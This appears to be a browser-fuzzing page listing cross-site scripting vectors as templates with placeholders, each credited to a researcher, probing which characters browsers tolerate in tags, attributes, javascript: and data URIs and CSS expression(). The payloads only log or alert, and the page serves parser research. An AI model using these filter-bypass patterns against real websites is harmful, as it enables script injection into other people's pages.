Featured vector

IE 9.0
<script>alert(1,1</script0x32a2/)</script>

Fuzz vector cloud

907,629 Successful fuzzes

Fuzz Vectors

Vectors not scanned by this browser

Description Vector Created by
aaaaaaaa <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @PunchyStickMeh
Alternatives to in attributes <img src=# onerror*chr*"log(*num*)" > @albinowax
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Break out of title <title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title> @0xAli
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Char that allows you to act as a slash in closing tag 2 <script>log(*num*)<*chr*script></script> @notxssninja
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters allowed after asterix in CSS comments <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> @garethheyes
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters allowed after colon in url <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url (no slashes) <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after paren rule <div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div> @garethheyes
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
Characters allowed after slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as gt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as h in http <script> !function(){ var a = document.createElement('a'); a.href='\*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as lt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as s in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as _ in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed attribute quote "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> @jackmasa
Characters allowed before a JavaScript function "`'><script>*chr*log(*num*)</script> @garethheyes
Characters allowed before CSS properties '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> @garethheyes
Characters allowed between CSS colon and expression ABC<div style="x:*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 01 ABC<div style="x:exp*chr*ression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 02 ABC<div style="x:expression*chr*(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS prop and expression ABC<div style="x*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed between slashes <script> !function(){ var a = document.createElement('a'); a.href='/\*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed between tag and attribute <script*chr*type="text/javascript">log(*num*);</script> @0xAli
Characters allowed for padding in a data URI 002 <script src="data:*chr*,log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 003 <script src="data:text/plain*chr*log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a VBS URI 001 <iframe src="vbs:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a VBS URI 002 <iframe src="vbscript:log*chr**num*"></iframe> @0x6D6172696F
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before rgb <div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters between rgb <div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div> @garethheyes
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters breaking JavaScript Regex delimiter "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> @0x6D6172696F
Characters eating backslash in javascript string <script>if("x\*chr*".length==1) { log(*num*);}</script> @mhswende
Characters eating backslash in javascript string 2 <script>if("x\*chr*".length==2) { log(*num*);}</script> @mhswende
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending HTML closing tags (HTML4) <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> @0x6D6172696F
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters ignored in Javascript function call "`'><script>lo*chr*g(*num*)</script> @mhswende
Characters ignored inside javascript string v2 <script>if("x*chr*x" == "xx") { log(*num*);}</script> @mhswende
Characters in script inside XML elements 001 <p><svg><script>*chr*log(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 002 <p><svg><script>l*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 003 <p><svg><script>*chr*og(*num*)</script></p> @0x6D6172696F
Characters not encoded by encodeURI <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> @shafigullin
Characters not encoded by encodeURIComponent <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> @shafigullin
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters syntactically equivalent to colon in a URI <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @_cweb
Characters syntactically equivalent to single quote in HTML attributes `"'><img src='#*chr* onerror=log(*num*)> @_cweb
Characters that are new lines <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Characters that are spaces <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters that close a HTML comment 3 --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> @DOMXss
Characters that close a quote <script charset="*chr*>log(*num*)</script> @0xAli
Characters that close HTML tags <script>log(*num*)</script*chr* @0x6D6172696F
Characters that close JS Comments '"`><script>/* **chr*log(*num*)// */</script> @garethheyes
Characters that trigger a new attr after new line <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> @garethheyes
Characters to end script tag via JavaScript regex 001 <script>log(*num*,1</script*chr*/)</script> @0x6D6172696F
Characters to end script tag via JavaScript regex 002 <script>log(*num*,1</script*chr*//)</script> @0x6D6172696F
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Characters trimmed my trim <script> if ('*chr*'.trim() === '') { log(*num*); } </script> @shafigullin
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Determine what character can replace in end tags <script>log(*num*)<*chr*script> @MisterJyu
determine what characters can be inside a script tag "`'><sc*chr*ript>log(*num*)</sc*chr*ript> @MisterJyu
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Escape from attribute a closing tag <a href="*chr*><script>log(*num*)</script>" /> @shafigullin
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
foobar <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni* @Sidhpurwala
Hex characters allowed after asterix in CSS comments <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> @garethheyes
JS in img src for selfxss <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> @ethicalhack3r
NULL Characters inside JavaScript properties `'"><script>window['log*chr*'](*num*)</script> @garethheyes
Opening paren expression check <div style="xss:expression(logChr*chr**num*))">test</div> @garethheyes
prime browser <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @thetestmanager
Quoteless attributes breaker <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> @garethheyes
Replacement for greater and less than signs *chr*script*chr alert(1) *chr**chr*script*chr @MisterJyu
Replacement for greater and less than signs (revised) *chr*script*chr* log(*num*) *chr**chr*script*chr @MisterJyu
Replacement for greater than sign *chr*script>log(*num*)</script> @mhswende
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Single quote break <script charset='*chr*>log(*num*)</script> @0xAli
Space characters in RegExp <script> if ('*chr*'.replace(/\s/g, '') === '') { log(*num*); } </script> @shafigullin
Valid characters after expression <div style="xss:expression(logChr(*num*))*chr*junk"></div> @garethheyes
Valid characters after expression 2 <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> @garethheyes
Valid characters after expression 3 <div style="xss:expression(logChr(*num*))'*chr*junk"></div> @garethheyes
Valid characters after expression 4 <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> @garethheyes

All vectors

Description Vector Created by
aaaaaaaa <b id="id1" x=begin0x9fa0end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @PunchyStickMeh
Alternatives to in attributes <img src=# onerror*chr*"log(*num*)" > @albinowax
Array variables <script> props=props.concat(Object.getOwnPropertyNames([])); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if([][arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Break out of title <title>hello*chr*<*chr**raw1*><script>alert(*num*)</script></title> @0xAli
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Char that allows you to act as a slash in closing tag 2 <script>log(*num*)<*chr*script></script> @notxssninja
Character between lt and slash in closing tag <script>log(*num*)<*chr*/script> @shafigullin
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters allowed after asterix in CSS comments <div id="fuzzelement*num*" style="/***chr*/;color:#000000;"></div> @garethheyes
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters allowed after colon in url <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*//somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after colon in url (no slashes) <script> !function(){ var a = document.createElement('a'); a.href='http:\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after paren rule <div id="fuzzelement*num*" style="color:rgb(0,0,0)*chr*junk;"></div> @garethheyes
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
Characters allowed after slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed after uri host "`'/><img/onload=log(*num*) src="http://shazzer.co.uk*chr*/favicon.ico"/> @jackmasa
Characters allowed as gt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '>somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as h in http <script> !function(){ var a = document.createElement('a'); a.href='\*chr*ttp://somehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as lt in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '<somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as s in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*omehost.com'; if(a.protocol === 'http:' && a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as slash in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '/somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed as _ in url <script> !function(){ var a = document.createElement('a'); a.href='http://\*chr*somehost.com'; if(a.protocol === 'http:' && a.host === '_somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed attribute quote "/><img/onerror=*chr*log(*num*)*chr*src=xxx:x /> @jackmasa
Characters allowed before a JavaScript function "`'><script>*chr*log(*num*)</script> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before CSS properties '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> @garethheyes
Characters allowed before paren <div id="fuzzelement*num*" style="color:rgb*chr*(0,0,0);"></div> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed between CSS colon and expression ABC<div style="x:*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 01 ABC<div style="x:exp*chr*ression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 02 ABC<div style="x:expression*chr*(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS prop and expression ABC<div style="x*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed between slashes <script> !function(){ var a = document.createElement('a'); a.href='/\*chr*/somehost.com'; if(a.host === 'somehost.com') { logChr(*num*); } }() </script> @garethheyes
Characters allowed between tag and attribute <script*chr*type="text/javascript">log(*num*);</script> @0xAli
Characters allowed for padding in a data URI 001 <script src="data:text/plain,lo*chr*g(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 002 <script src="data:*chr*,log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 003 <script src="data:text/plain*chr*log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a VBS URI 001 <iframe src="vbs:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a VBS URI 002 <iframe src="vbscript:log*chr**num*"></iframe> @0x6D6172696F
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before paren in Javascript call "'`><script>log*chr*(*num*)</script> @garethheyes
Characters before rgb <div id="fuzzelement*num*" style="color:*chr*rgb(0,0,0);"></div> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters between rgb <div id="fuzzelement*num*" style="color:r*chr*gb(0,0,0);"></div> @garethheyes
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters breaking JavaScript Regex delimiter "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> @0x6D6172696F
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F
Characters eating backslash in javascript string <script>if("x\*chr*".length==1) { log(*num*);}</script> @mhswende
Characters eating backslash in javascript string 2 <script>if("x\*chr*".length==2) { log(*num*);}</script> @mhswende
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending HTML closing tags (HTML4) <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> @0x6D6172696F
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters ignored in html event handler name <img src=x on*chr*Error="javascript:log(*num*)"/> @mhswende
Characters ignored in Javascript function call "`'><script>lo*chr*g(*num*)</script> @mhswende
Characters ignored inside javascript string v2 <script>if("x*chr*x" == "xx") { log(*num*);}</script> @mhswende
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters in script inside XML elements 001 <p><svg><script>*chr*log(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 002 <p><svg><script>l*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 003 <p><svg><script>*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 004 "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> @0x6D6172696F
Characters not encoded by encodeURI <script> if ('*uni*' === encodeURI('*uni*')) { log(*num*); } </script> @shafigullin
Characters not encoded by encodeURIComponent <script> if ('*uni*' === encodeURIComponent('*uni*')) { log(*num*); } </script> @shafigullin
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters syntactically equivalent to colon in a URI <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @_cweb
Characters syntactically equivalent to single quote in HTML attributes `"'><img src='#*chr* onerror=log(*num*)> @_cweb
Characters that are new lines <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Characters that are spaces <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> @garethheyes
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Characters that close a HTML comment --><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> --> @garethheyes
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters that close a HTML comment 3 --><!-- -*chr*-> <img src=xxx:x onerror=log(*num*)> --> @DOMXss
Characters that close a quote <script charset="*chr*>log(*num*)</script> @0xAli
Characters that close HTML tags <script>log(*num*)</script*chr* @0x6D6172696F
Characters that close JS Comments '"`><script>/* **chr*log(*num*)// */</script> @garethheyes
Characters that trigger a new attr after new line <img src=1 title= x:xx*chr*/onerror=logChr(*num*)> @garethheyes
Characters to end script tag via JavaScript regex 001 <script>log(*num*,1</script*chr*/)</script> @0x6D6172696F
Characters to end script tag via JavaScript regex 002 <script>log(*num*,1</script*chr*//)</script> @0x6D6172696F
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Characters trimmed my trim <script> if ('*chr*'.trim() === '') { log(*num*); } </script> @shafigullin
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Determine what character can replace in end tags <script>log(*num*)<*chr*script> @MisterJyu
determine what characters can be inside a script tag "`'><sc*chr*ript>log(*num*)</sc*chr*ript> @MisterJyu
Document body variables <script> props=props.concat(Object.getOwnPropertyNames(document.body)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(document.body[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Document variables <script> props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document[arguments[0]])customLog(arguments[0]); }catch(e){}; }) </script> @garethheyes
Does this browser support e4x <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> @garethheyes
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Escape from attribute a closing tag <a href="*chr*><script>log(*num*)</script>" /> @shafigullin
Events in tags with src or href that execute javascript <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*="customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
foobar <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)>*datadhtmlprops**datadhtmlprops**datadhtmlprops**datadhtmlprops**hex6**uni* @Sidhpurwala
Function variables <script> props=props.concat(Object.getOwnPropertyNames(function(){})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(function(){}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Hex characters allowed after asterix in CSS comments <div id="fuzzelement*num*" style="/**\*hex2*/;color:#000000;"></div> @garethheyes
Iframe contentDocument properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
Iframe contentWindow properties <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> @garethheyes
JS in img src for selfxss <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> @ethicalhack3r
NULL Characters inside JavaScript properties `'"><script>window['log*chr*'](*num*)</script> @garethheyes
Number variables <script> props=props.concat(Object.getOwnPropertyNames(new Number(123))); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if((123)[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Object variables <script> props=props.concat(Object.getOwnPropertyNames({})); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if({}[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Opening paren expression check <div style="xss:expression(logChr*chr**num*))">test</div> @garethheyes
prime browser <b id="id1" x=begin0x2924end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id1').getAttribute('x'))) { alert(1);}</script> @thetestmanager
Quoteless attributes breaker <img src=xxx:xxx title=1*chr*/onerror=logChr(*num*)> @garethheyes
Regexp variables <script> props=props.concat(Object.getOwnPropertyNames(/a/)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(/a/[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Replacement for greater and less than signs *chr*script*chr alert(1) *chr**chr*script*chr @MisterJyu
Replacement for greater and less than signs (revised) *chr*script*chr* log(*num*) *chr**chr*script*chr @MisterJyu
Replacement for greater than sign *chr*script>log(*num*)</script> @mhswende
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Single quote break <script charset='*chr*>log(*num*)</script> @0xAli
Space characters in RegExp <script> if ('*chr*'.replace(/\s/g, '') === '') { log(*num*); } </script> @shafigullin
String variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(''[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes
Tags and events that execute javascript <*datahtmlelements* *datahtmlattributes*="javascript:parent.customLog('*datahtmlelements* *datahtmlattributes*')"></*datahtmlelements*> @garethheyes
Tags and events that execute javascript 2 <*datahtmlelements* *dataevents*="javascript:parent.customLog('*datahtmlelements* *dataevents*')"></*datahtmlelements*> @garethheyes
Tags that execute onerror <*datahtmlelements* src=1 href=1 onerror="customLog('*datahtmlelements*')"></*datahtmlelements*> @garethheyes
Uncode sequences generating illegitimate ASCII <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> @0x6D6172696F
Valid characters after expression <div style="xss:expression(logChr(*num*))*chr*junk"></div> @garethheyes
Valid characters after expression 2 <div style="xss:expression(logChr(*num*))*chr**chr*junk"></div> @garethheyes
Valid characters after expression 3 <div style="xss:expression(logChr(*num*))'*chr*junk"></div> @garethheyes
Valid characters after expression 4 <div style="xss:expression(logChr(*num*))\*hex2* junk"></div> @garethheyes
Window variables <script> props=props.concat(Object.getOwnPropertyNames(window)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ if(window[arguments[0]])customLog(arguments[0]); }) </script> @garethheyes